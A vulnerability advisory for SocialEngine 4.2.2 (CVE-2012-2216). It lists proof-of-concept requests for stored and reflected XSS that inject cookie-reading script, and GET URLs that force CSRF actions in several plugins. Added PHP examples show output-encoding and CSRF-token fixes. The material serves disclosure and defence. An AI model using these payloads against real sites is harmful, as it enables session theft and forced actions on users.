Social Engine 4.2.2 Multiple Vulnerabilities

Earlier versions are also possibly vulnerable.

INFORMATION

Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216

OVERVIEW

Social Engine version 4.2.2 is vulnerable to XSS and CSRF.

INTRODUCTION

SocialEngine is a PHP-based white-label social networking service
platform that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.

VULNERABILITY DESCRIPTION

== Persistent XSS in music upload ==

CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.

Proof of Concept:
POST http://localhost/index.php/music/create

POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15

== Persistent XSS in creating events ==

POST http://localhost/socialengine/socialengine422_trial/index.php/events/create

POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=

== Reflected XSS in search form of events area ==

Direct JavaScript injected:
POST http://localhost/index.php/widget/index/content_id/644

format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- Go to URL: /index.php/event/$EVENT_ID
- Click on "Guests"
- Click in the "Search guests" form
- Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert.
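The three XSS findings above share one root cause, CWE-79, but need two different fixes: the stored "title", "description" and "location" values are written into HTML, while the reflected "search" value is written into a JavaScript string literal, where HTML escaping alone does not help. The following is an added example, not SocialEngine's own code; the function names, the rendering snippets and the PHP 7.3+ JSON_THROW_ON_ERROR flag are assumptions, and the inputs are the payloads from the proof-of-concept requests above.

```php
<?php
// Added example, not SocialEngine code: context-aware output encoding for the
// two CWE-79 patterns above. Function and variable names are hypothetical.
declare(strict_types=1);

// HTML body/attribute context: stored fields such as "title", "description"
// and "location" are rendered here. ENT_QUOTES also escapes single quotes,
// so the value cannot break out of a single-quoted attribute either.
function encodeForHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// JavaScript string-literal context: the reflected "search" value is placed
// inside a JS string, so HTML escaping is the wrong tool. Emit a JSON string
// literal with <, >, &, ' and " hex-escaped; the closing quote and any
// "</script>" in the payload can then never end the literal or the block.
// JSON_THROW_ON_ERROR (PHP 7.3+) makes invalid UTF-8 fail loudly instead of
// json_encode() returning false, which would otherwise be concatenated as "".
function encodeForJsString(string $untrusted): string
{
    return json_encode(
        $untrusted,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed inputs: the payloads from the proof-of-concept requests above.
$storedTitle = '<script>alert(document.cookie);</script>';
$searchTerm  = "';alert(document.cookie);var a = '";

// Vulnerable rendering: raw concatenation, which is exactly what CWE-79 describes.
$vulnerableHtml = '<h2>' . $storedTitle . '</h2>';
$vulnerableJs   = "var q = '" . $searchTerm . "';";

// Hardened rendering: encode for the context the value is written into.
$hardenedHtml = '<h2>' . encodeForHtml($storedTitle) . '</h2>';
$hardenedJs   = 'var q = ' . encodeForJsString($searchTerm) . ';';

echo "Vulnerable HTML: $vulnerableHtml\n";
echo "Hardened HTML:   $hardenedHtml\n";
echo "Vulnerable JS:   $vulnerableJs\n";
echo "Hardened JS:     $hardenedJs\n";
```

The hardened JS line comes out as `var q = "\u0027;alert(document.cookie);var a = \u0027";`, so the injected quote never terminates the literal. The point worth remembering from the reflected case is that the encoder is chosen by the output context, not by the input field: the same "search" value would need encodeForHtml() if it were echoed into the page body instead.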

== Multiple CSRF vulnerabilities ==

CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.

A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1

Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do
some activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2

Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2

"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2

"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do some activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0

Close the classified listing:
GET /index.php/classifieds/close/1/closed/1
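Every CSRF case above has the same shape: a state change (close, open, watch) reachable by a plain GET with nothing in the request that proves the owner intended it, which is CWE-352. The standard fix is to accept such actions only via POST and to require a per-session synchronizer token that a third-party page cannot read. The code below is an added example, not SocialEngine's own code; the function names, the $session array standing in for PHP's session, the request shapes and the "close topic" handler are all hypothetical.

```php
<?php
// Added example, not SocialEngine code: synchronizer-token CSRF protection for
// the state-changing actions listed above (close/open topic, event, listing).
// All function names, the $session array and the request shapes are hypothetical.
declare(strict_types=1);

// Issue one unpredictable token per session and reuse it for every form.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in each form that changes state; the token is
// HTML-escaped even though it is hex, as a matter of habit.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(issueCsrfToken($session), ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '">';
}

// True only for a POST whose token matches the session's token.
function isValidCsrfRequest(string $method, array $post, array $session): bool
{
    // A state change behind a plain GET (the /close/close/1 URLs above) can be
    // triggered by any <img> or link on a third-party page, token or not.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $provided = $post['csrf_token'] ?? '';
    // Reject arrays (csrf_token[]=x) before hash_equals(), which requires strings,
    // and compare in constant time so the token cannot be guessed byte by byte.
    if (!is_string($expected) || $expected === '' || !is_string($provided)) {
        return false;
    }
    return hash_equals($expected, $provided);
}

// Hypothetical "close topic" handler; returns [HTTP status, body].
function closeTopicAction(string $method, array $post, array $session): array
{
    if (!isValidCsrfRequest($method, $post, $session)) {
        return [403, 'Forbidden: missing or invalid CSRF token'];
    }
    $topicId = (int) ($post['topic_id'] ?? 0);
    // The ownership check and database update would go here.
    return [200, "Topic $topicId closed"];
}

// Constructed requests: a forged cross-site GET, a POST with no token, and a
// legitimate POST carrying the token from the victim's own form.
$session = [];
$token = issueCsrfToken($session);
echo csrfField($session), "\n";
foreach ([
    ['GET',  ['topic_id' => 4]],
    ['POST', ['topic_id' => 4]],
    ['POST', ['topic_id' => 4, 'csrf_token' => $token]],
] as [$method, $post]) {
    [$status, $body] = closeTopicAction($method, $post, $session);
    echo "$method -> $status $body\n";
}
```

Only the third request is accepted. Moving the action to POST on its own is not sufficient (a hidden auto-submitting form on another site can POST just as easily), and a token on its own is not sufficient if GET still works; the handler needs both. Setting the session cookie with SameSite=Lax adds a browser-side layer but does not replace the token check for older clients.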

VERSIONS AFFECTED

Tested with version 4.2.2, but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to Social Engine 4.2.4.

NOTES

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

CREDITS

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - http://www.secplus.com.br/
BugSec Security Team - http://bugsec.googlecode.com/

--
Tiago Natel de Moura
IT Security Consultant
http://www.linkedin.com/in/tiagonatel
http://www.secplus.com.br/
http://github.com/tiago4orion
http://code.google.com/p/bugsec